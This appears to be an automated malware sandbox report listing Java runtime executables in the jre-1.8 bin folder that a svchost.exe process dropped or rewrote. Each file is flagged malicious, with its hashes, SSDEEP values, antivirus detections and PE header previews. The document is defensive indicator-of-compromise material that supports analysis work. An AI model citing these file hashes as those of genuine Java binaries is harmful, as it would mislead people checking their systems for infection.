                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F0787FC5FA7150B95395C73A4DA74F0A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E1AABAE674A2679FB20225C3D41DCA328FFC3208
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5AD28B15DB55C1396F62F6F040350D170C3D3387999A82452EA40A5E43497833
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E8C3272AFDAF5DBAB3DA260845BE580BA62E7FF23DF60C2E4473E9E77CE8D2BC6192E16F3B6A9D59A491D1DD503B0DF0D38031FDBA20A43F4FFC02EC649FB65B
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................x.......................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.446043646488426
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:tnEbH0j4x7R6SvyCMZXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:tkwOtO7ZsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:80FAA457AA521C1831598AF525224F13
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BBDC824492ED0FF10FAEE4AF7262CA9094F8FBA5
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4C9512D8F53B7DA5D441A84875001595EA4935AA72A9463047582E00E0F2382E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EC298B805BA30A67CC3B6C989C9A23E16A02DC9615F23227B475602813BEF93D81DE4DDF63A1CB55DE0F20461005F0F4905D247376AD4E5FCC9004D78BC9289C
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@......4........................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1212416
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1197031965229955
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:3v1vvcXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:/18sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8091FEBD780C4DF4A8B6549F71866776
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:59C8A20598CF6D645905A64251D9238586117811
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F7572C03E80734D3A7F7E67208E0224F700D6930DE1E097124F0417DABF056E3
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7BE2CCAC61BEE95F883412DEC122CD6B3A8AC583F4B605A8DD64C32ECFEDB1DBD768C81EC8930D20CD68045A5BB221E4960C00889531899158468DABE55101E9
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@..................................-......................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.446801406173828
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:3nU/h/4K2sqjnhMgeiCl7G0nehbGZpbD:3U/V6Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B327B62DA545963F9E76CAA356E30D80
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:DCE8E6E0F1DFD4D786198B9CE368FAFD5F24088D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CCB202CB0879949C627B384C65FA538658F835F6EB11B5561D0DDF1DAACC68DF
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C3E345D6D6661467712B2002D0A79B28933B84F886E0B7F76F9463A9CE340D8E8138CDE2A4FA85CE8832491A4F93888FAEEB500C44E3FD8DFE61105269979A68
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@......4........................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1513984
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.483713977089683
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:dx71iBLZ05jNTmJWExdsqjnhMgeiCl7G0nehbGZpbD:dxhiHIjNgBDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:16FFC9BB5EF05192C87932BC6FD143C3
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:175F64D70BA74C86B248B87C95686B9EC036944D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:18FD0F65A8333046B18DF8C3F7EEF1CA6F0E83CF230D1B70254BD780DB8EB127
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7D9F1D6E15F5FC7D57C26A69751E8FA82F7BD06770C7F528CE92FEBD7C46266FE60C3C9BF21A15E067A33A9D3FF4E95FF094F02200DFC498A0065B66FBF36001
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.............................................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032858310908653
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:w3rgXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:c8sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:FB47667E07DC2714363BBEA608F191EB
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F538305E4444380497F8540077F84775C0E86E0E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BDD073ABC9DB340538060AB4A24103BC1397552F5956A9103D10ADEC7A441DB3
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:ED942FFC8A4CDD252C95019EDBDA7E0DAD298469FC7440379F7D2D455C315BDEFEE0499F2D582DBD728F9E462427B1E652BCC6A6722A8B180F4E49C224219263
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................E.......................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1242112
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.172646284948021
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:oYdP/LXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:9dP/LsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:96BC571E80F09B3A2D67749CFCD95164
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:3491671B5E2D806D42C5C3EC405F1800CFC3B2D6
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:9FAD6C8762892F153B52D9E6D40B41C9E3E2F002216F7D006003DB39142E58D9
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:697431728C3676755682138E5A435B41C4BC626462C62315DA19B4F6536C31AEDD6F01053A2BA166C46681A840B26E35E8321DB5D56276E73B5053712513F7D6
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................P..................................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032882566063927
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:Hy54Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:SWsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A598373B4110994EC80E12803E8E837E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:267269ED0C64370B8CCECE74B21A17A948917823
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D1CF5F71F0CCAB7247AE32A3CB319CF6FC6F9B71BD6F30BDFAB556E945E4B407
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7F93E7E2F649C92FB6BB9DE34F2BB9B208D65F3BF815BDD6A5B9418A6623550CFE5C6D8C825728FE7136226B3C1860409F33EC78379C52BEF735FABAF1EF69A1
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032941026032053
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:UKlQXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:pCsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:24C2DB8D9FB3B940E81B90D566D88DDC
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BAFEB9B364CE24450D78D3D200032BC8921C2544
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EFCD1D9760AF64EB91728B6875E2130C47626979455086BD757DBD22D4C23878
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F855565F9D62FAA8755CF2901C0FEB2F3C034FA6120A9B381FC9ED9950A90CDF883F5D6A2C17391264B049C497D68C2F0A9F08AFB3F47593EB34B0318BD0DDA6
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032946961409351
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:xilQXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:cCsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A59612F60188242D95CE4098FE04142F
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:745119237B8FBD38EF750CC4134F75478A410804
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6B5B7E72F2CED22B7ECD2A0E4F8E60B0E269885D5B9CC7A31A3C4FD3EF6F5FE2
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:77A99AFEF01F94B094A4BFCD2791DB8854ADA5B9898C11DFF9504CDFCF305181586EACA34C83687745A45A2FF406F1AA8098D07C4782A3D0734FABDDDDB2F0E2
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032913859947036
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:xTmwXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:V1sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:756FB3E8E95ACEC1695CA1F442DEA705
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F91052B714BD31D32D281C42A8199B42001EF45D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D4F23216037E24B0965E0B2B8E73FD4FF2012615945ED8A5A3319030F5DFFEA5
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5FA9E7A83519C2659FB0BE32D9CCD0F8B3BABFFCC9ED6F00852E89823EBC711032531BBA7A1A121470E988E1A7C3E8FE57034FD646842C14BB580915B21E289D
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................B.......................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.033814236546821
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:FamcXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:85sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:7C8EE58F594E8D9025811BCCD365DA9E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FA21BCF8B5C8DEBF6FAFA957D5B99F5744A41BFC
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B916595084E297FBF4DEA88ADB154C7DC2058D06AACEEF13EA995F46E6108DE5
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1750F058FE398A7CB65B414BAF05708A1DA0CC997C0A29E08CD5986D2646672D46E075637EF7228C1D8C3083EB58C843B9A87D009577F6B36716976256F737EB
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................W{......................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032902542911684
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:9Q54Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:O+sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A990AA274F02692167E4A31552C8D0B0
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:71FFC2077AC9297D8B99FBB2D76C3649E5F2752D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:04F0D1AC6402CE5A01FEC0414A73CDA6457AEDC2FFEC5B592E5EF1236DCB8FEF
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C221B557BD285C5619C33325D554F154AD8468CF63FF94C647D2534F5CC0E14FABC5AAEA544288743C857A6C0196327C9F4C61739A0BAAF35F726CDE1B55944E
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................t........................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032934263587826
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:VV/QXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:3osqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F4C0C99C5D700FC7D7ADDADC4CE521D0
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:588FABA38D461C838AC1F1217A746C47424121CC
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:347F0BEAAE7784C849261E24C1AA899EFD3EB8C97DD61E2C3D2BEE3B4802363A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A60160A26F394BFA5E46A0801E590245D25B70F9CE669B0F0A689AD3D82D364F70C6F6E4F8B660718D3B3175194F424468AE70232675B0691FDFE8FF9581A87E
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
